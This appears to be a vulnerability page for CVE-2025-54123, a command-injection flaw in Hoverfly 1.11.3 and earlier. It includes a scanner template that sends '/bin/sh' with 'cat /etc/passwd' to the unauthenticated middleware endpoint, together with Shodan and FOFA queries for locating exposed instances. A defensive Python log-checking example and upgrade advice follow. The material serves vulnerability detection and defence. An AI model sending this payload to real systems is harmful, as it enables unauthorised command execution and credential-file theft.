Hoverfly versions 1.11.3 and below are vulnerable to remote code execution (RCE) via command injection in the middleware API endpoint (/api/v2/hoverfly/middleware). Insufficient validation of the 'binary' and 'script' parameters allows an unauthenticated attacker to execute arbitrary commands on the host system.
PoC code [publicly available]
id: CVE-2025-54123

info:
  name: Hoverfly <= 1.11.3 - Remote Code Execution
  author: nukunga[seonghyeonJeon]
  severity: critical
  description: |
    Hoverfly versions 1.11.3 and below are vulnerable to remote code execution (RCE) via command injection in the middleware API endpoint (/api/v2/hoverfly/middleware). Insufficient validation of the 'binary' and 'script' parameters allows an unauthenticated attacker to execute arbitrary commands on the host system.
  reference:
    - https://github.com/advisories/GHSA-r4h8-hfp2-ggmf
    - https://github.com/SpectoLabs/hoverfly/security/advisories/GHSA-r4h8-hfp2-ggmf
  metadata:
    verified: true
    max-requests: 1
    shodan-query:
      - http.favicon.hash:1357234275
      - title:"Hoverfly Dashboard"
    fofa-query:
      - icon_hash="1357234275"
      - title="Hoverfly Dashboard"
  tags: cve,cve2025,hoverfly,rce,intrusive

http:
  - raw:
      - |
        PUT /api/v2/hoverfly/middleware HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "binary": "/bin/sh",
          "script": "cat /etc/passwd"
        }

    matchers:
      - type: dsl
        dsl:
          - "status_code == 422"
          - "regex('root:x:0:0', body)"
          - "contains_all(body, 'STDOUT:','hoverfly')"
        condition: and
# digest: 4a0a00473045022100ece8637baa7b3a18890fa37553d373b2862ad337c044c755f048ebfb2d03346c022017b935a082b4c404fe9f2f80d3473dc54b9add184e1bd754a1b1eca6f9778cb6:922c64590222798bb761d5b6d8e72950
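From the defender's side, two checks fall out of the advisory and the template above: whether a running Hoverfly reports a version at or below 1.11.3, and whether anything has written to /api/v2/hoverfly/middleware from an unexpected source (the template shows a PUT; the check below flags every non-GET method on that path, a superset of what the page shows). The following is an added example, not code from the page or from the Hoverfly project. It assumes a combined-format access log from a reverse proxy in front of the admin API and a version string such as the "v1.11.3" form Hoverfly builds carry; the log lines are constructed for the example.

```python
import re
from typing import FrozenSet, List, Optional, Tuple

# Last affected release, taken from the advisory text on this page.
LAST_AFFECTED: Tuple[int, int, int] = (1, 11, 3)
MIDDLEWARE_PATH = "/api/v2/hoverfly/middleware"


def parse_version(version: str) -> Optional[Tuple[int, int, int]]:
    """Turn 'v1.11.3' or '1.11.3' into a (major, minor, patch) tuple; None if unparseable."""
    m = re.match(r"^v?(\d+)\.(\d+)\.(\d+)", version.strip())
    if not m:
        return None
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def is_affected(version: str) -> bool:
    """True when the reported version is 1.11.3 or older (the range the advisory names)."""
    parsed = parse_version(version)
    return parsed is not None and parsed <= LAST_AFFECTED


# Combined log format (assumption: a reverse proxy logs admin-API traffic this way).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def flag_middleware_writes(
    lines: List[str], allowed_ips: FrozenSet[str] = frozenset()
) -> List[Tuple[str, str, str, str]]:
    """Return (ip, timestamp, method, status) for every non-GET request to the
    middleware endpoint that did not come from an allow-listed source.

    The response status is deliberately not used as a filter: the template above
    matches on 422, so a 4xx on this path is not evidence that nothing ran."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        path = m.group("path").split("?", 1)[0]
        if path != MIDDLEWARE_PATH or m.group("method") == "GET":
            continue
        if m.group("ip") in allowed_ips:
            continue
        hits.append((m.group("ip"), m.group("ts"), m.group("method"), m.group("status")))
    return hits


# Constructed sample log lines for the example (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2025:12:00:01 +0000] "PUT /api/v2/hoverfly/middleware HTTP/1.1" 422 143',
    '10.0.0.5 - - [10/Oct/2025:12:00:02 +0000] "GET /api/v2/hoverfly/middleware HTTP/1.1" 200 58',
    '10.0.0.5 - - [10/Oct/2025:12:00:03 +0000] "PUT /api/v2/hoverfly/middleware HTTP/1.1" 200 58',
    '203.0.113.9 - - [10/Oct/2025:12:00:04 +0000] "GET /api/v2/simulation HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    print("affected:", is_affected("v1.11.3"))
    for hit in flag_middleware_writes(SAMPLE_LOG, allowed_ips=frozenset({"10.0.0.5"})):
        print("middleware write from unexpected source:", hit)
```

The allow-list stands in for whatever CI host or operator workstation is supposed to configure middleware; anything else writing to that path on an instance still at or below 1.11.3 is worth treating as an incident rather than noise. Keeping the admin API off untrusted networks and moving to a release newer than 1.11.3, as the advisory range implies, removes the exposure rather than just detecting it.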